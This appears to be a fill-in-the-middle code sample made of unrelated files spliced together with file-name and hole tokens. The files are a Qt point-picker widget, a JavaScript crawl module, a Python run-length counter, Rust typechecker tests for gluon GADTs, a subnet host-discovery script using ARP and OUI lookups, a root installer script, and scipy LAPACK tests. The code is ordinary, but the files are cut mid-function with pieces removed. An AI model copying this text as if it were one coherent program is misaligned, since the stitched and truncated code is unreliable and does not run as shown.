Qt.QGraphicsItem.ItemIsFocusable | # Necessary in order for item to receive keyboard events
Qt.QGraphicsItem.ItemIsSelectable |
Qt.QGraphicsItem.ItemIsMovable |
Qt.QGraphicsItem.ItemSendsGeometryChanges # Necessary in order for .itemChange to be called when item is moved
)
def itemChange(self, change, value):
if change == Qt.QGraphicsItem.ItemPositionHasChanged:
self.picker.point_item_position_has_changed.emit(self)
return super().itemChange(change, value)
def keyPressEvent(self, event):
if event.key() == Qt.Qt.Key_Delete and event.modifiers() == Qt.Qt.NoModifier:
self.picker.delete_selected()
def type(self):
return self.QGRAPHICSITEM_TYPE
# NB: deriving from Qt.QGraphicsObject is necessary in order to be a scene event filter target
class SimplePointPicker(Qt.QGraphicsObject):
"""ex:
from ris_widget.ris_widget import RisWidget
from ris_widget.examples.simple_point_picker import SimplePointPicker
rw = RisWidget()
simple_point_picker = SimplePointPicker(rw.main_view, rw.main_scene.layer_stack_item)"""
QGRAPHICSITEM_TYPE = UNIQUE_QGRAPHICSITEM_TYPE()<|fim▁hole|> def __init__(self, general_view, parent_item, points=None):
super().__init__(parent_item)
self.view = general_view
self.view.viewport_rect_item.size_changed.connect(self.on_viewport_size_changed)
self.point_items = []
self.pen = Qt.QPen(Qt.Qt.red)
self.pen.setWidth(2)
color = Qt.QColor(Qt.Qt.yellow)
color.setAlphaF(0.5)
self.brush = Qt.QBrush(color)
self.brush_selected = Qt.QBrush(Qt.QColor(255, 0, 255, 127))
parent_item.installSceneEventFilter(self)
if points:
for point in points:
self.make_and_store_point_item(Qt.QPointF(point[0], point[1]))
def boundingRect(self):
return Qt.QRectF()
def paint(self, QPainter, QStyleOptionGraphicsItem, QWidget_widget=None):
pass
def type(self):
return self.QGRAPHICSITEM_TYPE
def make_and_store_point_item(self, pos):
point_item = PointItem(self, -7, -7, 15, 15, self.parentItem())
point_item.setScale(1 / self.view.transform().m22())
point_item.setPen(self.pen)
point_item.setBrush(self.brush)
flags = point_item.flags()
point_item.setFlags(
flags |
Qt.QGraphicsItem.ItemIsFocusable | # Necessary in order for item to receive keyboard events
Qt.QGraphicsItem.ItemIsSelectable |
Qt.QGraphicsItem.ItemIsMovable |
Qt.QGraphicsItem.ItemSendsGeometryChanges
)
point_item.installSceneEventFilter(self)
self.point_items.append(point_item)
point_item.setPos(pos)
def delete_selected(self):
for idx, item in reversed(list(enumerate((self.point_items)))):
if item.isSelected():
self.scene().removeItem(item)
del self.point_items[idx]
self.point_item_list_content_reset.emit()
def sceneEventFilter(self, watched, event):
if watched is self.parentItem():
if event.type() == Qt.QEvent.GraphicsSceneMousePress and event.button() == Qt.Qt.RightButton:
self.make_and_store_point_item(event.pos())
return True
if event.type() == Qt.QEvent.KeyPress and event.key() == Qt.Qt.Key_Delete and event.modifiers() == Qt.Qt.NoModifier:
self.delete_selected()
return False
def on_viewport_size_changed(self):
scale = 1 / self.view.transform().m22()
for point_item in self.point_items:
point_item.setScale(scale)
def clear(self):
for point_item in self.point_items:
self.view.scene().removeItem(point_item)
self.point_items = []
self.point_item_list_content_reset.emit()
@property
def points(self):
return [(point_item.pos().x(), point_item.pos().y()) for point_item in self.point_items]
@points.setter
def points(self, points):
self.clear()
for point in points:
self.make_and_store_point_item(Qt.QPointF(point[0], point[1]))<|fim▁end|> |
point_item_position_has_changed = Qt.pyqtSignal(PointItem)
point_item_list_content_reset = Qt.pyqtSignal()
|
<|file_name|>prior.js<|end_file_name|><|fim▁begin|>'use strict';
var DB = require('./lib/database');
var rc_util = require('./lib/utility.js');
var modelsFactory = require('./lib/models.js');
var selective = require('./program').selective;
var Promise = require('bluebird');
module.exports = function(dbUrl, commander, lastCrawl) {
return new Promise(function(resolve, reject) {
function useLatestCrawl(latestCrawl) {
var ipps = rc_util.getIpps(latestCrawl);
if (ipps) {<|fim▁hole|> selective(ipps, commander)
.then(resolve)
.catch(reject);
}
}
if (lastCrawl) {
useLatestCrawl(lastCrawl);
} else {
rc_util.getLatestRow(dbUrl, commander.logsql)
.then(function(row) {
useLatestCrawl(JSON.parse(row.data));
})
.catch(reject);
}
});
};<|fim▁end|> | |
<|file_name|>uniqc_m.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python -Wall
# ================================================================
# Given a list, returns a list of pairs of elements and repetition counts.
# Example (with commas elided for legibility):
#
# Input: [ 1 1 1 2 2 3 3 3 3 5 5 1 1 ]
#   Output: [ [1 3] [2 2] [3 4] [5 2] [1 2] ]
#
# I.e. there is a run of 3 1's, then a run of 2 2's, then a run of 4 3's, then
# 2 5's, then 2 1's. This is similar to the output of the Unix "uniq -c" command,
# if the input were one number per line. However, uniq -c puts the columns in
# reverse order from what I do here.
# ================================================================
# John Kerl
# [email protected]
# 2008-01-22
# ================================================================
def uniqc(list):
rv = []
n = len(list)
if (n == 0):
return []
curri = 0
nexti = 1
head = list[curri]
count = 1
while (curri < n):
if (nexti == n): # Last element in the list
if (list[curri] == head):
rv.append([head, count])
else:
rv.append([list[curri], 1])
elif (list[curri] == list[nexti]):
count += 1
else:
rv.append([head, count])
head = list[nexti]
count = 1
curri += 1
nexti += 1
return rv
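# Quick sanity demo of the pair ordering described in the header comment
# ([element, count], i.e. the reverse of uniq -c's columns); a hedged
# addition for clarity, not part of the original module:
if __name__ == '__main__':
    assert uniqc([1, 1, 1, 2, 2, 3, 3, 3, 3, 5, 5, 1, 1]) == \
        [[1, 3], [2, 2], [3, 4], [5, 2], [1, 2]]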
# ----------------------------------------------------------------
# Test cases:
#def test1(list):
# #print list
# #print uniqc(list)
# #print
#
# # Pipe the output to, say, expand -20.
# print list, "\t", uniqc(list)
#
#def test_uniqc():
# test1([])<|fim▁hole|># test1([8])
# test1([8, 8])
# test1([8, 9])
# test1([9, 8])
# test1([9, 9])
# test1([8, 8, 8])
# test1([8, 8, 9])
# test1([8, 9, 8])
# test1([8, 9, 9])
# test1([9, 8, 8])
# test1([9, 8, 9])
# test1([9, 9, 8])
# test1([9, 9, 9])
#
#test_uniqc()<|fim▁end|> | |
<|file_name|>test_header.py<|end_file_name|><|fim▁begin|># -*- encoding: utf-8 -*-
# from django.test import TestCase
# from block.tests.helper import check_content
# from compose.tests.factories import HeaderFactory
<|fim▁hole|># class TestHeader(TestCase):
#
# def test_content_methods(self):
# c = HeaderFactory()
# check_content(c)<|fim▁end|> | |
<|file_name|>gadt.rs<|end_file_name|><|fim▁begin|>extern crate gluon_base as base;
extern crate gluon_check as check;
extern crate gluon_parser as parser;
#[macro_use]
mod support;
use crate::check::typecheck::TypeError;
test_check! {
basic1,
r#"
type Test a =
| Int : Int -> Test Int
Int 1
"#,
"test.Test Int"
}
test_check_err! {
basic_error,
r#"
type Test a =
| Int : Int -> Test Int
Int ""
"#,
TypeError::Unification(..)
}
test_check! {
basic2,
r#"
type Test a =
| Int : Int -> Test Int
let f x : Test a -> Int =
match x with
| Int x -> x
()
"#,
"()"
}
test_check! {
basic3,
r#"
type Test a =
| Int : Int -> Test Int
let f x : Test a -> a =
match x with
| Int x -> x
()
"#,
"()"
}
test_check! {
different_types_concrete,
r#"
type Test a =
| Int : Int -> Test Int
| Float : Float -> Test Float
<|fim▁hole|> | Float x -> x
()
"#,
"()"
}
test_check! {
different_types_a,
r#"
type Test a =
| Int : Int -> Test Int
| A : a -> Test a
let f x : Test a -> a =
match x with
| Int x -> x
| A x -> x
()
"#,
"()"
}
test_check_err! {
different_types_error,
r#"
type Test a =
| Int : Int -> Test Int
| A : Test a
let f x y : Test a -> b -> a =
match x with
| Int x -> x
| A -> y
()
"#,
Unification(..)
}
test_check_err! {
using_parameter_with_specific_type_errors,
r#"
type Test a =
| Test : a -> Test Int
let f x : Test a -> a =
match x with
| Test x -> x
()
"#,
Unification(..)
}
test_check_err! {
invalid_gadt_return1,
r#"
type Test2 a = a
type Test a =
| Test : a -> Test2 Int
()
"#,
TypeConstructorReturnsWrongType { .. }
}
test_check_err! {
invalid_gadt_return2,
r#"
type Test2 a = a
type Test a =
| Test : a -> (Int -> Int)
()
"#,
TypeConstructorReturnsWrongType { .. }
}
test_check! {
match_on_none,
r#"
type Option a = | None | Some a
match None with
| Some y -> y
| None -> 1
"#,
"Int"
}<|fim▁end|> | let f x : Test a -> a =
match x with
| Int x -> x |
<|file_name|>discover.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# Discover the target host types in the subnet
#
# @author: Sreejith Kesavan <[email protected]>
import arp
import oui
import ipcalc
import sys
class Discovery(object):
""" Find out the host types in the Ip range (CIDR)
NOTE: This finds mac addresses only within the subnet.
It doesn't fetch mac addresses for routed network ip's.
"""
def __init__(self):
self.__arp = arp.ARP()
self.__oui = oui.OUI()
def discover(self, address):
"""
Traverse the IP subnets and return manufacturer info.
"""
network = ipcalc.Network(address)
for ip in network:
ip = str(ip)
# Ignore broadcast IP Addresses
if '/' in address and ip == str(network.broadcast()):
print 'Ignoring broadcast ip: {broadcast}'.format(broadcast=str(network.broadcast()))
continue
mac = self.__arp.find_mac(ip)
if mac:
if len(mac.split(':')[0]) == 1:
mac = '0' + mac
manuf_str = mac.replace(':', '')[:6].upper()
manuf = self.__oui.find_manuf(manuf_str)
if manuf:
yield (ip, manuf)
def run():
if len(sys.argv) < 2:
print
print 'Usage:\t\tidiscover <ip-address/cidr>'
print 'Examples:'
print '\t\tidiscover 10.73.19.0'
print '\t\tidiscover 10.74.215/24'
print
else:
addrs = sys.argv[1:]
d = Discovery()
try:
for addr in addrs:
for ip, manuf in d.discover(addr):
print 'IP Address: {ip} Manufacturer: {manuf}'.format(ip=ip, manuf=manuf)
except KeyboardInterrupt:<|fim▁hole|> run()<|fim▁end|> | print 'Exiting...'
if __name__ == '__main__': |
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import sys, shutil
try:
from gi.repository import Gtk, Gdk, Vte, GLib, Pango, GConf, GdkPixbuf
import json, os, getpass
from pycm.pycm_globals import *
except ImportError as e:
print "Error during importing of necessaries modules.\nError is '%s'" % e<|fim▁hole|>python_path = "/usr/lib/python2.7/dist-packages/"
module_path = python_path + 'pycm'
bin_exe = '/usr/bin/pycm.py'
launcher = '/usr/share/applications/pyconnection-manager.desktop'
uid = os.getuid()
def __init__():
if uid > 0:
print "You need to be root to install pyConnection Manager"
sys.exit()
try:
remove_old()
    except (OSError, IOError):
print "ERROR removing old stuff"
sys.exit()
try:
create_new()
    except (OSError, IOError):
print "ERROR installing pyConnection Manager"
sys.exit()
    ok = "\n\tpyConnection Manager successfully installed\n"
print ok
def remove_old():
if os.path.exists(module_path):
shutil.rmtree(module_path)
if os.path.exists(GLADE_DIR):
shutil.rmtree(GLADE_DIR)
if os.path.exists(IMAGE_DIR):
shutil.rmtree(IMAGE_DIR)
if os.path.exists(bin_exe):
os.remove(bin_exe)
if os.path.exists(launcher):
os.remove(launcher)
def create_new():
shutil.copytree('pycm', module_path)
shutil.copytree('glade', GLADE_DIR)
shutil.copytree('img', IMAGE_DIR)
shutil.copyfile('pycm.py', '/usr/bin/pycm')
shutil.copyfile('pyconnection-manager.desktop', launcher)
dir_list = [module_path, GLADE_DIR, IMAGE_DIR]
for i in dir_list:
        os.chmod(i, 0755)  # octal mode; directories need the execute bit
__init__()<|fim▁end|> | sys.exit()
|
<|file_name|>test_lapack.py<|end_file_name|><|fim▁begin|>#
# Created by: Pearu Peterson, September 2002
#
import sys
import subprocess
import time
from functools import reduce
from numpy.testing import (assert_equal, assert_array_almost_equal, assert_,
assert_allclose, assert_almost_equal,
assert_array_equal)
import pytest
from pytest import raises as assert_raises
import numpy as np
from numpy import (eye, ones, zeros, zeros_like, triu, tril, tril_indices,
triu_indices)
from numpy.random import rand, randint, seed
from scipy.linalg import (_flapack as flapack, lapack, inv, svd, cholesky,
solve, ldl, norm, block_diag, qr, eigh)
from scipy.linalg.lapack import _compute_lwork
from scipy.stats import ortho_group, unitary_group
import scipy.sparse as sps
try:
from scipy.linalg import _clapack as clapack
except ImportError:
clapack = None
from scipy.linalg.lapack import get_lapack_funcs
from scipy.linalg.blas import get_blas_funcs
REAL_DTYPES = [np.float32, np.float64]
COMPLEX_DTYPES = [np.complex64, np.complex128]
DTYPES = REAL_DTYPES + COMPLEX_DTYPES
def generate_random_dtype_array(shape, dtype):
    # generates a random matrix of the desired shape and data type
if dtype in COMPLEX_DTYPES:
return (np.random.rand(*shape)
+ np.random.rand(*shape)*1.0j).astype(dtype)
return np.random.rand(*shape).astype(dtype)
def test_lapack_documented():
"""Test that all entries are in the doc."""
if lapack.__doc__ is None: # just in case there is a python -OO
pytest.skip('lapack.__doc__ is None')
names = set(lapack.__doc__.split())
ignore_list = set([
'absolute_import', 'clapack', 'division', 'find_best_lapack_type',
'flapack', 'print_function', 'HAS_ILP64',
])
missing = list()
for name in dir(lapack):
if (not name.startswith('_') and name not in ignore_list and
name not in names):
missing.append(name)
assert missing == [], 'Name(s) missing from lapack.__doc__ or ignore_list'
class TestFlapackSimple:
def test_gebal(self):
a = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a1 = [[1, 0, 0, 3e-4],
[4, 0, 0, 2e-3],
[7, 1, 0, 0],
[0, 1, 0, 0]]
for p in 'sdzc':
f = getattr(flapack, p+'gebal', None)
if f is None:
continue
ba, lo, hi, pivscale, info = f(a)
assert_(not info, repr(info))
assert_array_almost_equal(ba, a)
assert_equal((lo, hi), (0, len(a[0])-1))
assert_array_almost_equal(pivscale, np.ones(len(a)))
ba, lo, hi, pivscale, info = f(a1, permute=1, scale=1)
assert_(not info, repr(info))
# print(a1)
# print(ba, lo, hi, pivscale)
def test_gehrd(self):
a = [[-149, -50, -154],
[537, 180, 546],
[-27, -9, -25]]
for p in 'd':
f = getattr(flapack, p+'gehrd', None)
if f is None:
continue
ht, tau, info = f(a)
assert_(not info, repr(info))
def test_trsyl(self):
a = np.array([[1, 2], [0, 4]])
b = np.array([[5, 6], [0, 8]])
c = np.array([[9, 10], [11, 12]])
trans = 'T'
# Test single and double implementations, including most
# of the options
for dtype in 'fdFD':
a1, b1, c1 = a.astype(dtype), b.astype(dtype), c.astype(dtype)
trsyl, = get_lapack_funcs(('trsyl',), (a1,))
if dtype.isupper(): # is complex dtype
a1[0] += 1j
trans = 'C'
x, scale, info = trsyl(a1, b1, c1)
assert_array_almost_equal(np.dot(a1, x) + np.dot(x, b1),
scale * c1)
x, scale, info = trsyl(a1, b1, c1, trana=trans, tranb=trans)
assert_array_almost_equal(
np.dot(a1.conjugate().T, x) + np.dot(x, b1.conjugate().T),
scale * c1, decimal=4)
x, scale, info = trsyl(a1, b1, c1, isgn=-1)
assert_array_almost_equal(np.dot(a1, x) - np.dot(x, b1),
scale * c1, decimal=4)
def test_lange(self):
a = np.array([
[-149, -50, -154],
[537, 180, 546],
[-27, -9, -25]])
for dtype in 'fdFD':
for norm_str in 'Mm1OoIiFfEe':
a1 = a.astype(dtype)
if dtype.isupper():
# is complex dtype
a1[0, 0] += 1j
lange, = get_lapack_funcs(('lange',), (a1,))
value = lange(norm_str, a1)
if norm_str in 'FfEe':
if dtype in 'Ff':
decimal = 3
else:
decimal = 7
ref = np.sqrt(np.sum(np.square(np.abs(a1))))
assert_almost_equal(value, ref, decimal)
else:
if norm_str in 'Mm':
ref = np.max(np.abs(a1))
elif norm_str in '1Oo':
ref = np.max(np.sum(np.abs(a1), axis=0))
elif norm_str in 'Ii':
ref = np.max(np.sum(np.abs(a1), axis=1))
assert_equal(value, ref)
class TestLapack:
def test_flapack(self):
if hasattr(flapack, 'empty_module'):
# flapack module is empty
pass
def test_clapack(self):
if hasattr(clapack, 'empty_module'):
# clapack module is empty
pass
class TestLeastSquaresSolvers:
def test_gels(self):
seed(1234)
# Test fat/tall matrix argument handling - gh-issue #8329
for ind, dtype in enumerate(DTYPES):
m = 10
n = 20
nrhs = 1
a1 = rand(m, n).astype(dtype)
b1 = rand(n).astype(dtype)
gls, glslw = get_lapack_funcs(('gels', 'gels_lwork'), dtype=dtype)
# Request of sizes
lwork = _compute_lwork(glslw, m, n, nrhs)
_, _, info = gls(a1, b1, lwork=lwork)
assert_(info >= 0)
_, _, info = gls(a1, b1, trans='TTCC'[ind], lwork=lwork)
assert_(info >= 0)
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
gels, gels_lwork, geqrf = get_lapack_funcs(
('gels', 'gels_lwork', 'geqrf'), (a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
lwork = _compute_lwork(gels_lwork, m, n, nrhs)
lqr, x, info = gels(a1, b1, lwork=lwork)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
lqr_truth, _, _, _ = geqrf(a1)
assert_array_equal(lqr, lqr_truth)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
gels, gels_lwork, geqrf = get_lapack_funcs(
('gels', 'gels_lwork', 'geqrf'), (a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
lwork = _compute_lwork(gels_lwork, m, n, nrhs)
lqr, x, info = gels(a1, b1, lwork=lwork)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1.521240901196909j],
dtype=dtype), rtol=25*np.finfo(dtype).eps)
lqr_truth, _, _, _ = geqrf(a1)
assert_array_equal(lqr, lqr_truth)
def test_gelsd(self):
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
gelsd, gelsd_lwork = get_lapack_funcs(('gelsd', 'gelsd_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, iwork, info = gelsd_lwork(m, n, nrhs, -1)
lwork = int(np.real(work))
iwork_size = iwork
x, s, rank, info = gelsd(a1, b1, lwork, iwork_size,
-1, False, False)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
assert_allclose(s, np.array([12.596017180511966,
0.583396253199685], dtype=dtype),
rtol=25*np.finfo(dtype).eps)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
gelsd, gelsd_lwork = get_lapack_funcs(('gelsd', 'gelsd_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, rwork, iwork, info = gelsd_lwork(m, n, nrhs, -1)
lwork = int(np.real(work))
rwork_size = int(rwork)
iwork_size = iwork
x, s, rank, info = gelsd(a1, b1, lwork, rwork_size, iwork_size,
-1, False, False)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1.521240901196909j],
dtype=dtype), rtol=25*np.finfo(dtype).eps)
assert_allclose(s,
np.array([13.035514762572043, 4.337666985231382],
dtype=dtype), rtol=25*np.finfo(dtype).eps)
def test_gelss(self):
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
gelss, gelss_lwork = get_lapack_funcs(('gelss', 'gelss_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, info = gelss_lwork(m, n, nrhs, -1)
lwork = int(np.real(work))
v, x, s, rank, work, info = gelss(a1, b1, -1, lwork, False, False)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
assert_allclose(s, np.array([12.596017180511966,
0.583396253199685], dtype=dtype),
rtol=25*np.finfo(dtype).eps)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
gelss, gelss_lwork = get_lapack_funcs(('gelss', 'gelss_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, info = gelss_lwork(m, n, nrhs, -1)
lwork = int(np.real(work))
v, x, s, rank, work, info = gelss(a1, b1, -1, lwork, False, False)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1.521240901196909j],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
assert_allclose(s, np.array([13.035514762572043,
4.337666985231382], dtype=dtype),
rtol=25*np.finfo(dtype).eps)
def test_gelsy(self):
for dtype in REAL_DTYPES:
a1 = np.array([[1.0, 2.0],
[4.0, 5.0],
[7.0, 8.0]], dtype=dtype)
b1 = np.array([16.0, 17.0, 20.0], dtype=dtype)
            gelsy, gelsy_lwork = get_lapack_funcs(('gelsy', 'gelsy_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, info = gelsy_lwork(m, n, nrhs, 10*np.finfo(dtype).eps)
lwork = int(np.real(work))
jptv = np.zeros((a1.shape[1], 1), dtype=np.int32)
v, x, j, rank, info = gelsy(a1, b1, jptv, np.finfo(dtype).eps,
lwork, False, False)
assert_allclose(x[:-1], np.array([-14.333333333333323,
14.999999999999991],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
for dtype in COMPLEX_DTYPES:
a1 = np.array([[1.0+4.0j, 2.0],
[4.0+0.5j, 5.0-3.0j],
[7.0-2.0j, 8.0+0.7j]], dtype=dtype)
b1 = np.array([16.0, 17.0+2.0j, 20.0-4.0j], dtype=dtype)
            gelsy, gelsy_lwork = get_lapack_funcs(('gelsy', 'gelsy_lwork'),
(a1, b1))
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
# Request of sizes
work, info = gelsy_lwork(m, n, nrhs, 10*np.finfo(dtype).eps)
lwork = int(np.real(work))
jptv = np.zeros((a1.shape[1], 1), dtype=np.int32)
v, x, j, rank, info = gelsy(a1, b1, jptv, np.finfo(dtype).eps,
lwork, False, False)
assert_allclose(x[:-1],
np.array([1.161753632288328-1.901075709391912j,
1.735882340522193+1.521240901196909j],
dtype=dtype),
rtol=25*np.finfo(dtype).eps)
@pytest.mark.parametrize('dtype', DTYPES)
@pytest.mark.parametrize('shape', [(3, 4), (5, 2), (2**18, 2**18)])
def test_geqrf_lwork(dtype, shape):
geqrf_lwork = get_lapack_funcs(('geqrf_lwork'), dtype=dtype)
m, n = shape
lwork, info = geqrf_lwork(m=m, n=n)
assert_equal(info, 0)
class TestRegression:
    def test_ticket_1645(self):
for dtype in DTYPES:
a = np.zeros((300, 2), dtype=dtype)
gerqf, = get_lapack_funcs(['gerqf'], [a])
assert_raises(Exception, gerqf, a, lwork=2)
rq, tau, work, info = gerqf(a)
if dtype in REAL_DTYPES:
orgrq, = get_lapack_funcs(['orgrq'], [a])
assert_raises(Exception, orgrq, rq[-2:], tau, lwork=1)
orgrq(rq[-2:], tau, lwork=2)
elif dtype in COMPLEX_DTYPES:
ungrq, = get_lapack_funcs(['ungrq'], [a])
assert_raises(Exception, ungrq, rq[-2:], tau, lwork=1)
ungrq(rq[-2:], tau, lwork=2)
class TestDpotr:
def test_gh_2691(self):
# 'lower' argument of dportf/dpotri
for lower in [True, False]:
for clean in [True, False]:
np.random.seed(42)
x = np.random.normal(size=(3, 3))
a = x.dot(x.T)
dpotrf, dpotri = get_lapack_funcs(("potrf", "potri"), (a, ))
c, info = dpotrf(a, lower, clean=clean)
dpt = dpotri(c, lower)[0]
if lower:
assert_allclose(np.tril(dpt), np.tril(inv(a)))
else:
assert_allclose(np.triu(dpt), np.triu(inv(a)))
class TestDlasd4:
def test_sing_val_update(self):
sigmas = np.array([4., 3., 2., 0])
m_vec = np.array([3.12, 5.7, -4.8, -2.2])
M = np.hstack((np.vstack((np.diag(sigmas[0:-1]),
np.zeros((1, len(m_vec) - 1)))),
m_vec[:, np.newaxis]))
SM = svd(M, full_matrices=False, compute_uv=False, overwrite_a=False,
check_finite=False)
it_len = len(sigmas)
sgm = np.concatenate((sigmas[::-1], [sigmas[0] + it_len*norm(m_vec)]))
mvc = np.concatenate((m_vec[::-1], (0,)))
lasd4 = get_lapack_funcs('lasd4', (sigmas,))
roots = []
for i in range(0, it_len):
res = lasd4(i, sgm, mvc)
roots.append(res[1])
            assert_((res[3] <= 0),
                    "LAPACK root finding dlasd4 failed to find "
                    "the singular value %i" % i)
roots = np.array(roots)[::-1]
        assert_(not np.any(np.isnan(roots)), "There are NaN roots")
assert_allclose(SM, roots, atol=100*np.finfo(np.float64).eps,
rtol=100*np.finfo(np.float64).eps)
class TestTbtrs:
@pytest.mark.parametrize('dtype', DTYPES)
def test_nag_example_f07vef_f07vsf(self, dtype):
"""Test real (f07vef) and complex (f07vsf) examples from NAG
Examples available from:
* https://www.nag.com/numeric/fl/nagdoc_latest/html/f07/f07vef.html
* https://www.nag.com/numeric/fl/nagdoc_latest/html/f07/f07vsf.html
"""
if dtype in REAL_DTYPES:
ab = np.array([[-4.16, 4.78, 6.32, 0.16],
[-2.25, 5.86, -4.82, 0]],
dtype=dtype)
b = np.array([[-16.64, -4.16],
[-13.78, -16.59],
[13.10, -4.94],
[-14.14, -9.96]],
dtype=dtype)
x_out = np.array([[4, 1],
[-1, -3],
[3, 2],
[2, -2]],
dtype=dtype)
elif dtype in COMPLEX_DTYPES:
ab = np.array([[-1.94+4.43j, 4.12-4.27j, 0.43-2.66j, 0.44+0.1j],
[-3.39+3.44j, -1.84+5.52j, 1.74 - 0.04j, 0],
[1.62+3.68j, -2.77-1.93j, 0, 0]],
dtype=dtype)
b = np.array([[-8.86 - 3.88j, -24.09 - 5.27j],
[-15.57 - 23.41j, -57.97 + 8.14j],
[-7.63 + 22.78j, 19.09 - 29.51j],
[-14.74 - 2.40j, 19.17 + 21.33j]],
dtype=dtype)
x_out = np.array([[2j, 1 + 5j],
[1 - 3j, -7 - 2j],
[-4.001887 - 4.988417j, 3.026830 + 4.003182j],
[1.996158 - 1.045105j, -6.103357 - 8.986653j]],
dtype=dtype)
else:
raise ValueError(f"Datatype {dtype} not understood.")
tbtrs = get_lapack_funcs(('tbtrs'), dtype=dtype)
x, info = tbtrs(ab=ab, b=b, uplo='L')
assert_equal(info, 0)
assert_allclose(x, x_out, rtol=0, atol=1e-5)
@pytest.mark.parametrize('dtype,trans',
[(dtype, trans)
for dtype in DTYPES for trans in ['N', 'T', 'C']
if not (trans == 'C' and dtype in REAL_DTYPES)])
@pytest.mark.parametrize('uplo', ['U', 'L'])
@pytest.mark.parametrize('diag', ['N', 'U'])
def test_random_matrices(self, dtype, trans, uplo, diag):
seed(1724)
# n, nrhs, kd are used to specify A and b.
# A is of shape n x n with kd super/sub-diagonals
        # b is an n x nrhs matrix
n, nrhs, kd = 4, 3, 2
tbtrs = get_lapack_funcs('tbtrs', dtype=dtype)
is_upper = (uplo == 'U')
ku = kd * is_upper
kl = kd - ku
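        # ku/kl: number of super-/sub-diagonals of A (one of the two is zero
        # since A is triangular).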
# Construct the diagonal and kd super/sub diagonals of A with
# the corresponding offsets.
band_offsets = range(ku, -kl - 1, -1)
band_widths = [n - abs(x) for x in band_offsets]
bands = [generate_random_dtype_array((width,), dtype)
for width in band_widths]
if diag == 'U': # A must be unit triangular
bands[ku] = np.ones(n, dtype=dtype)
# Construct the diagonal banded matrix A from the bands and offsets.
a = sps.diags(bands, band_offsets, format='dia')
# Convert A into banded storage form
ab = np.zeros((kd + 1, n), dtype)
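        # LAPACK band storage: row `row` of ab holds the diagonal of A with
        # offset k, aligned so that ab[row, j] corresponds to column j of A.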
for row, k in enumerate(band_offsets):
ab[row, max(k, 0):min(n+k, n)] = a.diagonal(k)
# The RHS values.
b = generate_random_dtype_array((n, nrhs), dtype)
x, info = tbtrs(ab=ab, b=b, uplo=uplo, trans=trans, diag=diag)
assert_equal(info, 0)
if trans == 'N':
assert_allclose(a @ x, b, rtol=5e-5)
elif trans == 'T':
assert_allclose(a.T @ x, b, rtol=5e-5)
elif trans == 'C':
assert_allclose(a.H @ x, b, rtol=5e-5)
else:
raise ValueError('Invalid trans argument')
@pytest.mark.parametrize('uplo,trans,diag',
[['U', 'N', 'Invalid'],
['U', 'Invalid', 'N'],
['Invalid', 'N', 'N']])
def test_invalid_argument_raises_exception(self, uplo, trans, diag):
"""Test if invalid values of uplo, trans and diag raise exceptions"""
        # Argument checks occur independently of the used datatype.
        # This means we need not parametrize over all available datatypes.
tbtrs = get_lapack_funcs('tbtrs', dtype=np.float64)
ab = rand(4, 2)
b = rand(2, 4)
assert_raises(Exception, tbtrs, ab, b, uplo, trans, diag)
def test_zero_element_in_diagonal(self):
"""Test if a matrix with a zero diagonal element is singular
        If the i-th diagonal element of A is zero, ?tbtrs should return `i`
        in `info`, indicating that the provided matrix is singular.
Note that ?tbtrs requires the matrix A to be stored in banded form.
In this form the diagonal corresponds to the last row."""
